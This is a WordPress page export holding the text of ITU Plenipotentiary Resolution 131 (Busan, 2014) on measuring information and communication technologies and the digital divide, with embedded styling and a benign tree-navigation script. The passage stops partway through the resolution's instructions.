{"id":1680,"date":"2015-06-30T13:50:03","date_gmt":"2015-06-30T17:50:03","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=1680"},"modified":"2015-06-30T13:50:03","modified_gmt":"2015-06-30T17:50:03","slug":"pp-2014_131","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/plenipotentiary\/pp-2014\/pp-2014_131\/","title":{"rendered":"PP Resolution 131"},"content":{"rendered":"<p><style type=\"text\/css\">\nbody {}\n\n:link { color: #0000ff; text-decoration:none;}\n:visited { color: #6666ff; text-decoration:none; }\na:active { color: #0000ff; text-decoration:none;}\na:hover {color: #0000ff; text-decoration:underline; }\n\ndiv.basetext {}\n\ndiv.basetop {}\n\nh1 {\n    text-align:center;\n}\n\nspan.h2 {}\n\ndiv.year {}\n\ndiv.form {}\n\nspan.cpt {}\n\nspan.cm {}\n\n.fl {}\n\nul {}\n\nli {}\n\nul li {\n\tlist-style:square;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n\nli.basic {\n\tlist-style:square;\n\tlist-style-image:none;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\nspan.links {\n}\n\n\n\n\n.sub { display: none; }\n.subexp {display: block; }\n.sub { display: none; } \n\n.subexp {display: block; } \n\nli.exp {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.col {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.exp_active {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;  \n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer;\n}\n\nli.col_active {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer; \/* if not included, bullets are not shown right in moz*\/\n}\n\n\nli.basic_active {\n  list-style:square;\n  list-style-image:none;\n  background-color:#eeeeff;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\n\/* the 'boxed' and 'attributes' styles are used to display notes and attributes\n*\/\n\n.boxed,.nodecontent {display:inline;}\n.boxed .note-and-attributes {display:none;}\n\n.boxed:hover .note-and-attributes {\n\tposition:fixed; top:2em;right:10px;z-index:3;\n\tdisplay:block;\n\tmin-width:33%;\n\tmax-width:60%;\n\tmax-height:95%;\n\tcolor:black;\n\tbackground:#ffffff;\n\tfont:normal 16px courier, sans-serif;\n\tborder:1px solid black;\n\tpadding:10px;\n}\n\n.note:before {\n\tcontent:\"NOTE: \";\n\tfont-weight:bold;\n}\n\ntable.attributes {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable.attributes td,th {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\ntable.attributes th {\n\ttext-align:center;\n}\ntable.attributes caption {\n\tmargin-top:1em;\n\tfont-style:italic;\n\ttext-align:center;\n}\n\/* Thanks to wolfgangradke, https:\/\/sourceforge.net\/forum\/message.php?msg_id=5991663 *\/\ndiv.nodecontent > p {\n\tmargin-top:0pt;\n\tmargin-bottom:0pt;\n\tdisplay:inline;\n}\n\np + p { \n \tmargin-top: 0.5em !important;\n\tdisplay:block !important;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747128&group_id=7118*\/\ntable {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable td {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747000&group_id=7118*\/\nol {\n\tmargin-top:1px;\n    margin-bottom:1px;\n\tmargin-left:0px;\n\tpadding-left:3%;\n}\n\nol li {\n\tlist-style:decimal;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n<\/style><br \/>\n<script type=\"text\/javascript\">\r\n\/* MarkTree JavaScript code\r\n * \r\n * Distributed under the terms of the MIT License.\r\n * See \"LICENCE.MIT\" or http:\/\/www.opensource.org\/licenses\/mit-license.php for details.\r\n *\r\n * Software distributed under the License is distributed on an \"AS IS\" basis,\r\n * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\r\n * for the specific language governing rights and limitations under the\r\n * License.\r\n * \r\n * Miika Nurminen, 12.7.2004.\r\n *\/\r\n\r\n\/* cross-browser (tested with ie5, mozilla 1 and opera 5) keypress detection *\/\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u2030vi\u2030 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/script><\/p>\n<h3><span style=\"\">PP RESOLUTION 131 (Rev. Busan, 2014)<\/span><\/h3>\n<h4><span style=\"\">Measuring information and communication technologies to build an integrating and inclusive information society<\/span><\/h4>\n<p><span style=\"\">The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\">\n<div class=\"nodecontent\">aware<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that technological innovation, digitization and telecommunications\/information and communication technologies (ICTs) have the potential to achieve sustainability, while contributing to enhancing socio-economic development and quality of life;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        that there is still an ongoing need to call for the promotion of knowledge and the development of skills in all populations in order to achieve greater economic, social and cultural development and to raise the standard of living of the world&#8217;s citizens;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that each Member State is seeking to establish its own policies and regulatory frameworks based on ICT statistical data in order to narrow as effectively as possible the digital divide between those who have access to communication and information and those who do not,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recognizing<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that the outcomes of the World Summit on the Information Society (WSIS) represented an opportunity to identify a global strategy for narrowing the digital divide from the development standpoint;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        that the outcome of the global Partnership on Measuring ICT for Development has resulted in agreement on the identification of a set of basic indicators and a methodological framework for producing internationally comparable data for the measurement of ICT for development, as called for by \u00a7 115 of the Tunis Agenda for the Information Society;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that the WSIS+10 High-Level Event, in its WSIS+10 Vision for WSIS Beyond 2015, highlights that: \u201cICTs will play a critical role in achieving the sustainable development goals. Taking into account the ongoing dialogue on the Post-2015 Development Agenda (MDG review process) and the WSIS implementation process, all stakeholders have indicated the necessity of increased interaction between both processes in order to ensure that efforts across the UN system are coherent and coordinated to achieve maximum and sustainable impact\u201d,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">considering<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that the Geneva Plan of Action adopted by WSIS provides for the following: &#8220;In cooperation with each country concerned, develop and launch a composite ICT Development (Digital Opportunity) Index. It could be published annually, or every two years, in an ICT Development Report. The index could show the statistics while the report would present analytical work on policies and their implementation, depending on national circumstances, including gender analysis&#8221;;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        that key stakeholders, among which ITU (represented by the ITU Telecommunication Development Sector (ITU-D)), involved in the production of ICT statistics for measurement of the information society, joined forces to create a &#8220;global Partnership for Measuring ICT for Development&#8221;;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        the contents of Resolution 8 (Rev. Dubai, 2014) of the World Telecommunication Development Conference (WTDC) as well as the Dubai Action Plan, on collection and dissemination of telecommunication\/ICT information and statistics, with particular emphasis on consolidation of information and statistical data by the Telecommunication Development Bureau (BDT), in order to avoid duplication in this field;<\/div>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">d)        that, through the Dubai Action Plan, WTDC called upon ITU-D to:<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        collect, harmonize and disseminate data and official statistics in the area of telecommunications\/ICTs using a variety of data sources and dissemination tools, such as the World Telecommunication\/ICT Indicators (WTI) database, the ICT Eye ITU online portal, the UN Data portal and others;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        analyse telecommunication\/ICT trends and produce regional and global research reports, such as the Measuring the Information Society (MIS) report as well as statistical and analytical briefs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        benchmark telecommunication\/ICT developments and clarify the magnitude of the digital divide (using tools such as the ICT Development Index and the ICT Price Basket) and measuring the impact of ICTs on development and the gender digital divide;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        develop international standards, definitions and methodologies on telecommunication\/ICT statistics, in close cooperation with other regional and international organizations, including the United Nations, Eurostat, the Organisation for Economic Co-operation and Development and the Partnership on Measuring ICT for Development, for consideration by the United Nations Statistical Commission;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        provide a global forum for discussing information society measurements for ITU members and other national and international stakeholders, by organizing the World Telecommunication\/ICT Indicators Symposium and its related statistical expert groups;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        encourage Members States to bring together different stakeholders in government, academia and civil society in raising national awareness about the importance of production and dissemination of high-quality data for policy purposes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        contribute to the monitoring of internationally agreed goals and targets, including the Millenium Development Goals (MDGs) and WSIS targets as well as the targets set by the Broadband Commission for Digital Development, and developing related measurement frameworks;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        maintain a leading role in the global Partnership on Measuring ICT for Development and its relevant task groups;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        provide capacity building and technical assistance to Member States for the collection of telecommunication\/ICT statistics, in particular by means of national surveys, through the delivery of training workshops and the production of methodological manuals and handbooks;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">e)        the WSIS outcomes in relation to ICT indicators, especially the following paragraphs in the Tunis Agenda:<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        \u00a7 113, which called for formulating appropriate indicators and benchmarking, among them, indicators of ICT access and use, including community connectivity indicators, to clarify the magnitude of the digital divide, in both its domestic and international dimensions, and keep it under regular assessment, and tracking global progress in the use of ICTs to achieve internationally agreed development goals and objectives, including the MDGs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        \u00a7 114, which recognized the importance of the development of ICT indicators for measuring the digital divide and noted the launch of the Partnership for Measuring ICT for Development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        \u00a7 115, which noted the launch of the ICT Opportunity Index and the Digital Opportunity Index, based on the core indicators defined by the global Partnership on Measuring ICT for Development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        \u00a7 116, which stressed the need to take into account different levels of development and national circumstances;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        \u00a7 117, which called for further development of these indicators, in collaboration with the global partnership, in order to ensure cost-effectiveness and non-duplication in this field;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        \u00a7 118, which invited the international community to strengthen the statistical capacity of developing countries1 by giving appropriate support at national and regional levels;<\/div>\n<\/li>\n<li class=\"basic\"><img decoding=\"async\" src=\"pp%20131.html_files\/icons\/forward.png\" alt=\"forward\" \/>\n<div class=\"nodecontent\">\u2013        \u00a7 119, in which a commitment is made to review and follow up progress in bridging the digital divide, taking into account the different levels of development among nations, so as to achieve the internationally agreed development goals and objectives, including the MDGs, assessing the effectiveness of investment and international cooperation efforts in building the information society, identifying gaps as well as deficits in investment and devising strategies to address them;<\/div>\n<\/li>\n<li class=\"basic\"><img decoding=\"async\" src=\"pp%20131.html_files\/icons\/forward.png\" alt=\"forward\" \/>\n<div class=\"nodecontent\">\u2013        \u00a7 120, which indicates that the sharing of information related to the implementation of WSIS outcomes is an important element of evaluation,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">highlighting<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        the responsibilities that ITU-D had to assume as a result of the Tunis Agenda, especially its \u00a7\u00a7 112 to 120 thereof;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        that the Dubai Declaration adopted by WTDC-14 declares that: \u201cthe transparent and collaborative collection and dissemination of quality indicators and statistics that measure and provide comparative analysis of advancements in the use and adoption of ICTs continue to be a major factor for supporting socio-economic growth. These indicators and their analysis provide governments and stakeholders with a mechanism to better understand key drivers of telecommunication\/ICT adoption and assist in ongoing national policy formulation. They also serve to monitor the digital divide as well as progress towards achievement of internationally agreed goals in the post-2015 development agenda\u201d;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that the WSIS+10 High-Level Event, in its WSIS+10 Vision for WSIS Beyond 2015, states that: \u201cThe evolution of the information society over the past 10 years is contributing towards, inter alia, the development of knowledge societies around the world that are based on principles of freedom of expression, quality education for all, universal and non-discriminatory access to information and knowledge, and respect for cultural and linguistic diversity and cultural heritage. When mentioning the information society, we also refer to the above-mentioned evolution and to the vision of inclusive knowledge societies\u201d,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recognizing further<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that, with a view to providing their populations with faster access to telecommunication\/ICT services, many countries have continued to implement public policies for digital inclusion, including community connectivity in those communities that are poorly served with telecommunication facilities;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        that the approach of achieving universal service through community connectivity and broadband access instead of seeking in the short term to ensure that all households have a telephone line has become one of the main goals of ITU;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that the ICT Development Index is considered as the most important indicator of the digital divide,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">bearing in mind<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that, in order to keep each country&#8217;s public policy makers properly informed, ITU-D shall continue to strive to gather and periodically publish a variety of ICT statistics which provide some indication of the degree of progress in and penetration of telecommunication\/ICT services in the different regions of the world;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        that, according to the guidelines of the Plenipotentiary Conference, it is necessary to ensure as far as possible that the policies and strategies of the Union are fully in tune with the constantly changing telecommunication environment,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">noting<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that the Geneva Plan of Action adopted by WSIS identifies indicators and appropriate reference points, including indicators of ICT access and use, as elements for the follow-up and evaluation thereof;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        that the single ICT Development Index (IDI) was developed by ITU-D and has been published annually since 2009;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that Resolution 8 (Rev. Dubai, 2014) instructs the Director of BDT, among other actions, to prepare and compile community connectivity indicators and to participate in the establishment of core indicators to measure efforts to build the information society and, by doing so, to illustrate the scale of the digital divide and efforts made by developing countries to reduce it,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">resolves<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        that ITU, as a specialized agency of the United Nations, should spearhead the tasks of compiling information and statistical data on telecommunications\/ICTs; data for evaluating ICT trends; and data for measuring the impact of ICTs in narrowing the digital divide, showing, to the extent possible, their impact on matters related to gender, persons with disabilities and the different social sectors, as well as social inclusion, resulting from access in the areas of education, health, and e-government, etc., including their influence on the development and quality of life of all persons, highlighting their contribution to progress and sustainable development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        that ITU should strengthen its coordination with other relevant international organizations involved in the collection of ICT data, and establish a standardized set of indicators through the Partnership for Measuring ICT for Development, improving the availability and quality of ICT data and indicators and fostering the development of strategies and national, regional and international public policy,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">resolves to instruct the Secretary-General and the Director of the Telecommunication Development Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to take the measures necessary to enable ITU to carry out the tasks described in resolves 1 and 2 above;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to continue to promote the adoption of measures necessary to ensure that indicators of community connectivity and ICT access and use are taken into account in regional and world meetings convened for the purpose of evaluating and following up the Geneva Plan of Action and Tunis Agenda, also considering the WSIS+10 Statement on the implementation of WSIS outcomes and the emergence of new challenges in achieving the development of an inclusive information society in the wider context of the 